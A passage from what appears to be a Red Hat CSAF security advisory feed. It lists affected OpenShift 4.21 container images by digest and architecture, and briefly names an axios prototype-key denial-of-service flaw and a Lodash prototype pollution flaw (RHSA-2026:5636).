"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:b7efeca8929d172e7503b64eb8cc10702a773659b0164677340b7064fbd1c666_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:1a44fa131e595d60988892ad25b116fc222f73f6eeeb7ac9a97bf2f4c56c886b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:b51b328c0c3a959fef4f4c0f19e9181ddc6ea7d1fbaaee32aa08e503b4d3e073_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:dbe850c3431727e2807a166c82b2e40b220777e26075f4b8aca1999785a94eac_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:fddfe46a98d3a4c9a7c189eded7e26758c011f8f32d1617c337711cdd65c18be_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:145c212f961f62d710be50e24fc7a307e756b4a5e255393e003f33d3d5c91f8b_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:19a4b711ef857314773d4ca4f4a8b82d7a117250d4c2c92c57c1d1681e7330f6_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:4740f94bbe328edec319a168d5c4b35ec7c51ad5f0160a6cb0c450da99868ac1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:69fed0fc9f0b00ca9000d646f22eb727fdabc7de817dbdcbf28c4517c01e472d_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:35d92ed2b2bd3a721f928330e6a5edd25629fbb203db91f62b650e787be215d2_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:aa0e17fffcbd91951c877b5f4c9287a68f1732f69fda71c9313c38111352e113_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:c3a5a723959e11512f7332af7a60f34367a239fcc6572327240d17181b00b9b9_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:cf1f2538d8092d2de077e2a5f4ad37e73b59b1f25918ffbae586f20f2f2f1364_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3a419c18cfdf7042b7a65afae46f1b43f61935e0cbbcd54e36f49b078a2b070e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:429a55b2ba3ad36682ecd1620103ecdead80af48c9c42148fd72867e53aab0e0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:7965d673c6109f3fd2baa5efb4c54cae58fb9ba94b33ebba7d187c0f5679c9a0_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:991ca2f8ecf0ff4667112c5b0aff40813521700c6dad06f867e0e5e56086d6a7_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:27bc2f7818ed3b3c0837670c1906599718807aaee793029ebe3cba852985d107_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6195a65079f6c39b06a7be04d290dd49deaeba212ba499d233744d8cfd2c2de7_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:ac5ab16306a43fcdea3fbf40873cc8307422796118570ee78c6d2ccd7767fa32_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:cdea677053f22dfbac5d00aad0b562674f4141e7450c7c88072407104275e709_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:1356eb99499d3ee7f4b127a5a3de8c2f97b1ad0b7fd92a508eec43b1ecd0d5b3_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:2ac33325bea90b62eddee0e60b1ae0895025c185eaa53ce282f4fb67a0cd42d7_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:42ccddde25579f460d4d44bb64d6d6413460678db55538c23c9ba1409cdc5648_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:db21a1f0033fc83923453b258ea1dd38bf649ae3c4d3c4ef2301d4ce943b6bb0_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:30ce84b72533a1bafc328c4fa4cd97eeb4491e235cba8fff6c48756dab8e8271_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:6ef682c9b130a604095f29fd22801d700a8126af83838690377c796c831ac0d0_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:c11fd98702ea065a5addcf840a6144d9df3f7f3bc4901fb3d9873b72f773ccc0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:e0fcb23ee5c2635b54bf9c2b3b29d4f2bb1eb237db7ac2c0cc01be4dcb087fdd_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:21a29815d5d3fd34632ef852217f63319e3d5fdec795fae749e38d6381c29c15_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:3c2ae4e3bd8501436ec135700a13a6ed29ad6080cd151fd932646639787148a0_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:a6c7b7806fe1443ead913b7ea3cde3f768626d9dcb09089f60de3aa8c3681ff5_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:ff3f16308fcee12fe291fdc043366343c88bd30b9b449b646e548d36d3872077_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:20d0529049b4723cc2ee5a4996b751369d23ed770333a0e2710e0b7d74bbc46f_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:890269820c3fd7d222f60758203acb844003ad14b90c143dbd4a50790143947b_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:9774825c7f2e8541d9c3b03d1870add013b974b1a52224b08cf5ce3894d473d7_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:e52888476811447f15ac1a8aa5aa7c6a0610c27cfe996736b136027a475553a5_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:24e26ccdf054e4828cbf3196512d84304dca7c344219c979724e7d37a831c590_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:7bfcdd17d86d7585ffc6f25d4975e44b33ea51523f8afc27bace574b4da61ed1_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:9654c56daa0f42106d3a0ef75b134e4f8fa758894e1941548d122ff94b3677ca_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:e42fe14cfdf9c0a44404d009b1a42d7f1484316c227f3c480c8d0568cb41ef8c_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:08ef837af0a9a51853c9f7fb17e98a834f1bc4b09b0dd06944b51fc88cdb532f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:568557a3b1c4c0f276e2c118e1ce052880a7f8941459b20a2ab84baf23085fec_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:ccc0e2cd71654109461a0304fc7f03fd1cb6232598a77c04ce4d62e9b8ce0fa6_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d40a51c40a9a37a20234160b94a1bf080cc07bdadfc3d53620fb59640a155e29_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:06651a72194c592504a75661234d93a2d81d6d54fc53ce58cc4d62f6e5344fac_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:476478ca6f4d476333feb32ad72d78df98357a02dfe1a488d10d6d7aac05e50e_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:576ac2c2f80e7dc444be492df64d27145b626dc627bafe4d04c4dc3b464ee653_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:c471ff51606f3c56eb399d1b04bb035d97d6e81c470d2971c16371aba9a6d260_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:21055d354c6b6ad8850bc85223cab6a9173633524bafe31c1031b6f8693cd7d5_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:874d83aaac6d1573874c1b1703d7e68421e7c05777b10bb42bdb9c8faf136f04_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:8c77bc4638bb1745823c73a98ffb1d660b0d7b87aa93988a547f53bb10febea8_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:b73de7bc71be22699d9ea7258ed2cb2b6ec21660546ed275032bc2c297cdbf29_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:571f8f0f56ce502e2e8a6429415cca31858805d05fe0a2d2dc06e1376f5d6958_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:7973e6e926dce93531a2fce68ceb4f1a08128167b1a92f73ce82bc254e314473_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:83cd8f29cb94e04be62a3eebeb0b5134ab867e77cc629f6df5996f015691698b_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:b8e0c0d568c3167f8a409a257f0871c02f93d79ae84a6681d54ab6350177eeaa_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:02e33310f537d87191e72aa16de4bc7bbedcead6befdf0e686f9d08005df3872_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:6b733ac8700fec7ab2d0c8616014903eea9e5bb58bb03ca83b1deb0e2c3ea9a3_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:993664caa045d8064cf2f00015af685e41ae820664ddbf7b404228095374c520_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:d11bece814725c67d10c4b050c11785a13bcd98115847b96e6ee984290dcd113_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:5d8e93e5f498d9d364e8b50c6f6c5c70d1ac9f1506b99629ff185abf6b28d608_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:60c1cde27e89223959f2cbec07a7c1408063814897ad8cc8837ca7051e79952f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:cedb78beee71d3e070da1e6bd2623ab65afbe4cbee379b1617a53ecedbdfe56a_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:cee1d005ccd6d9c94ca010bc87f3a9fbbb42425677f5a9d89f20e1752980ed5e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:29e39816ed2201098199d5dbdc5f97bb584e815a1212fcda98cc51d7fdcb7508_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:3204209247dc1156aeb75d1c39318ec9134b83a54971069948dddef1d6b6cd12_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:3c3b9853705634c467564bc083186c2ab5e12602b3120afd6f0f2e443a4f66e7_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:978dafa970007d31c2852bfb77988c32682286d57661009997b119887e48bec7_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:3cf987d5f69ec722a2b608f18a58526e86a063c29c222afd7ef574e64452bbc1_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:53f90f1a9d059664796d663821bccf37f895c9562a6d31674b7eaab675238135_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:7d0a851c8b32356a0d3c02e28ca29ddb899f41f1d0ad6abf03671b4dccea0de0_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:dcc0c3762f4c80e5ae273da4e1fff620cc12d064d64489bac41ff83d8c88141c_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:18249c2a449d27f9c9d2d2914669bef0221e9d779630da939c8e45562e8eab55_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:251e0b536826e5353396f8069d508ef5f9cba6c38bc66be2aee9037759228834_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:848bdd1bed4275a4ea071b7351cafaed425fab7e82e3b71fb6d31b4a9a61d47a_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:b345413f9a1f1fef3738703c71bcb421b4eb795510637e8c5e8f6a20662035ad_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:1eb19e964813016a8287d03fbf76f10253b9403458297aac393cff083964bc86_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:844c042e56ff995d0fbcb560ca0bef9fe4799f7d4d36932034ea37fbc297c5cc_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:131459dfd1f4c159d75385b96fd46f8eb9aa260fd2b380406db49325bc858d6d_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:8933b234c6bd8186738f18d257dfc32d35641538925b52afd1a0a13d65e22fc8_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:04aaf3453b00bad5f560a3529744451850a7495a5b1c09d22602c4668d59334e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:4886d171f5973bfd35c0291181485bba6aa524eb8fc16d50a0fe58cf802e35f1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:12c93d59cee5e4b1e078728dcfff46a32d74022cadee43e8ba7ea6eec7c1550b_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:13755e7b9d537d64ea31a50af4c425415aac6b2e73a6624c291b09cc10ccdc84_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2851992f2dc7ddfa802ec2902a59e3cb6c19f23b8810e770e82b487748610e64_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:61597437e96e4fe017f1156d30528ea4d14246b0d8e7b68c205c56f7a151283f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:b679772c7eb5295743d31ff4df6f1419084c02990679b86009c4708589fe6403_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:c16b49f06ab83306a1859620bc6b9721b8cd6af4a55248f55aad32da14b3b7c8_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:1304433ac42f7966801fc7adb9bab2cb85db100c27299f0817a60436a57118c5_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:4622e61163cba7f1fa87feddf2832e0c8cb4dae6fb70f41b6e03b39cb93770ff_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:9e390a25735b44286e3649b4872910720050d0f710feb67f914621db1913ce8e_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:b51f2f5767746f45c1a3092fe327d65f162b999c0e674764d861f168301b71e6_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:0101d5fe5eb0f2c3144ba364412dcd21c0c7b08c0beacd3fc5dd564767b2d9e0_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:0bc5a5a619cb16e67f81551ea4b96af7a8db26addfb202d9ca5ceab4168f459f_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5b379b10c95eb7a89203d552ee1c3437ce0afbe61fb0afbdff6f5f421962df5b_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:81cb7b7fa35e3474c1be5650beaf6f6e963ee2f739221d7226933e3aa6a3f226_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:313bd25c0339ea434c08a438eda7bd5e3323bf0e02934ee4d01eb31af658a07a_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:38ee956747c9e76adb8038bc81918a6fb8a800313a93cff8822d309466754b67_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:3d3258d77f4829041e29a9dea806a0041237646e65ad3c3007d7cd98ec15bfdc_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:da587c47cc75ef54935b580d8e40852523c707e52954bcccf0def9da3de88063_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:1a3732c862f54453a192ebf7727b2f0339909e2207b3ae809ffa321f14d1cc17_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:270d198ff926a597b38e25e78868bce6ffd76c9601ba71e56d6312f5a35e3d37_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:b45c8f4aa119aefaed6080c553d7414b4d25ddb0968147f1344c2a82671ad177_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:bcf37dd6a57b6d6ecbd834cf812adee2dc841b8bf1d08c21ea29a3c6aab4d405_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:5251c3ad369f33e07c6e24f482c562edce287bdae6b8e505ecb8d3cf09fc32be_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:7304e26ef6c8ab4d2c647cc2ba65af9a92fd0f1fead62da0c435d71b397aada8_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:c6abce790ae93c39059b7dbfef6899b2ec75ba1a9864509f6cce28b1d356407e_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:f39b80836b998e584dc235933e600ee12746a3bfb0079aea1476a1eecf8f446d_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:399931f0229e6dd1c8da11cf570db838af5b8113d67e0071e8e7b1fdc59f735c_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:5df3c4493997002d40d9278e7ef6b90fb98905a2bba169b0410980d297bfade3_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:89b38bc6c2b4405d467684858b8a4f8980f6ad9d721e7ca75e9956f923639240_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:ab067ec0877565544332595cf9d023f4ad3479d940a8f3cb4f1eaf3f930d9e0f_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:1659061e1d03edc348e920093f213b35e95512807ce7dd83b2f1bd0b012d7900_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:62075f81a8bc4ce5a7192023a80f2e27c2bc4fae547193776513d67fbddad601_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:750827c34059a77d8599b6171204bc17cf971c4b0e9470007f4db319df31c860_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:9324db9c450ee8a54926478918a4efa70943cbc29ae8e2e67f51fe60bfd75335_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:2d95f6a57074c1132b809a735cc09c4aaccbd08a2a689bc0ee87426f766733c3_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:9b5c05ee9e7460a2a3fbf2539a4248581d4a69712a2be5601451019c52353cb2_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:b6809f3b2d4107dbb9e3338f63aa2f0646f19dd15a8980742e2aaa2e38d75362_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:c6e0d575be3fe6bab07ec95b244600e5eb6e8fcae5df1fd7b344381aae921c17_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:18f11df416a261b5f882d67f4de9a2dabbd8b80006ecabd033504d3b0fadb779_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:709239c59cc22bd41c553a7f30c147c4fb33ed6f560cba9ff976a966cc58dc3c_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:af2f03bf9b66959ac4e8568bdf8ffe864faa8808bb6790b554b1c3d5d80ea112_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:bb8d6f977a5b10490657a0e713ce281ac0680bf68caf893c46fe9ca84093b4b1_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:3d7c4d5a5809c712563175779356907b945010bf1357b78382ae405d89a8fd57_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:4b5f35cd93750652837275a4227ee08c40b2b7769ffdeec8a4d7a32ace69bbce_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:5aefedbf52b1d9b3ce8f6283e0716d4706b82fde65461a6924889ee507dfaa87_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:a90a60e27885e3ac1f74d00cb255478652da90af02a3771750b8598a53e9e48a_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:9508fcde0738479d7195d2fc5cb6f18818bf9285192589dc79899bf052773d7e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:1c68a858b265490854e9d48a61d3f98931c3283cbf71fd84395726ddfdbc7a66_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:15cf0592b04ce9f19f286634c3a03001ef16f37d89f7752222b167ccbae4f583_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:3a8ab1634350c3e9f3768b56beb304696d71f996f980ff3839c79e6eb4af1ea0_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:9508fcde0738479d7195d2fc5cb6f18818bf9285192589dc79899bf052773d7e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:1c68a858b265490854e9d48a61d3f98931c3283cbf71fd84395726ddfdbc7a66_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:b40b75179bce35e2b49402bd6e345f234223f6379a845972122b9ebeb36ac40a_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:37bffa4965d7ec59ecbfe8abf0a23d1e0411f9445c27237f9ca923cd1b96cb66_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:4d2f0e638d7c2632738ffdca9c391df061bbbb623f67138031590ef31cde06e6_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:549711d0027ee642c77126ff2cc280fef4ac6fa4b28605b9cbda4e34e3fcedfc_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:5ae6198359a92af6c4b317806ec8a33ff53d44189d14561a8f8a3153d7afdb81_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:c4d991da60458b7fd027719a7fe411bdfe82b192e7e882767dda61037e28aa3e_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
}
]
}
RHSA-2026:5636
Vulnerability from csaf_redhat - Published: 2026-03-24 14:23 - Updated: 2026-04-16 11:09A flaw was found in Lodash. A prototype pollution vulnerability in the _.unset and _.omit functions allows an attacker able to control property paths to delete methods from global prototypes. By removing essential functionalities, this can result in a denial of service.
